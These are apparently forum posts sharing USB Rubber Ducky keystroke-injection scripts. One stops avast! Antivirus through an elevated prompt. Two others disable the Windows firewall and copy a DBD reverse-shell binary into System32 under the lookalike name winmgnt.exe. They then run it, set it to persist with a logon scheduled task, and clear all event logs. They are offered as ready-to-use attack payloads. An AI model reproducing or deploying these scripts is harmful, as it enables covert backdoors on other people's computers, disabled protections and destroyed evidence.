buzbee

Not much to be said here. Stops avast! Antivirus shields to allow payload to fully execute. Could very easily be modified to stop any running services by name. DELAY 15000 REM This script will use an elevated command prompt to stop a service. REM I personally use this script to stop avast! Antivirus so I can execute the rest of my payload. GUI d DELAY 500 GUI r DELAY 500 STRING powershell Start-Process cmd.exe -Verb runAs ENTER DELAY 3000 ALT y DELAY 500 STRING net stop "avast! Antivirus" ENTER DELAY 1000 LEFTARROW LEFTARROW LEFTARROW DELAY 500 ENTER DELAY 1000 STRING exit ENTER The end lines are for confirmation that you want avast shields to be shut down If using this to stop another service please comment out the following line or change them to what is needed. LEFTARROW LEFTARROW LEFTARROW DELAY 500 ENTER That is all, thanks for looking at my script!

First Post, here it goes I love the idea of the simple-ducky payload generator, I however do not love the idea of using powershell to download the dbd reverse shell from a webserver, its sloppy and unpredictable. Solution - Copy and launch DBD from twin duck flashed ducky! First you will need to create your dbd executable. Now navigate to /var/www/ on your linux box and rename winmgnt.txt to winmgnt.exe, copy this to the root of your ducky sd card. Now for the script I have included 2 scripts, one for a box with admin rights, the other for standard user rights. REM *** DBD no downloading with powershell - ADMIN Access *** REM *** CMD with UAC Bypass *** DELAY 10000 WINDOWS r DELAY 200 STRING powershell Start-Process cmd.exe -Verb runAs ENTER DELAY 3000 ALT y DELAY 500 REM *** Minimize CMD Windows *** ENTER ENTER ALT SPACE DELAY 300 STRING M DELAY 200 DOWNARROW REPEAT 100 ENTER ENTER STRING netsh firewall set opmode disable ENTER DELAY 300 REM *** Define DUCKY drive as %duck% STRING for /f %d in ('wmic volume get driveletter^, label ^| findstr "DBD"') do set duck=%d ENTER DELAY 500 REM *** Copy DBD from Duck to HDD and execute DBD *** STRING copy %duck%\winmgnt.exe %WINDIR%\System32\winmgnt.exe ENTER DELAY 600 STRING %WINDIR%\System32\winmgnt.exe ENTER DELAY 200 STRING schtasks /create /sc onlogon /tn WindowsMgr /rl highest /tr "%WINDIR%\System32\winmgnt.exe" ENTER REM *** Clear logs and exit CMD *** ENTER STRING for /f %x in ('wevtutil el') do wevtutil cl "%x" ENTER DELAY 2000 ENTER ENTER STRING exit ENTER REM *** DBD no downloading with powershell - Standard User Access *** REM *** CMD *** DELAY 10000 WINDOWS r DELAY 200 STRING cmd.exe ENTER DELAY 3000 ALT y DELAY 500 REM *** Minimize CMD Windows *** ENTER ENTER ALT SPACE DELAY 300 STRING M DELAY 200 DOWNARROW REPEAT 100 ENTER ENTER DELAY 300 REM *** Define DUCKY drive as %duck% STRING for /f %d in ('wmic volume get driveletter^, label ^| findstr "DBD"') do set duck=%d ENTER DELAY 500 REM *** Copy DBD from Duck to HDD and execute DBD *** STRING copy %duck%\winmgnt.exe %WINDIR%\System32\winmgnt.exe ENTER DELAY 600 STRING %WINDIR%\System32\winmgnt.exe ENTER DELAY 200 STRING schtasks /create /sc onlogon /tn WindowsMgr /rl highest /tr "%WINDIR%\System32\winmgnt.exe" ENTER REM *** Clear logs and exit CMD *** ENTER STRING for /f %x in ('wevtutil el') do wevtutil cl "%x" ENTER DELAY 2000 ENTER ENTER STRING exit ENTER Hope you enjoy these scripts, if anything is wrong with them please let me know so i can fix them locally. NOTE - The Volume label of the sd card should be "DBD" to work with the script, but if you know what your doing change that to whatever you want.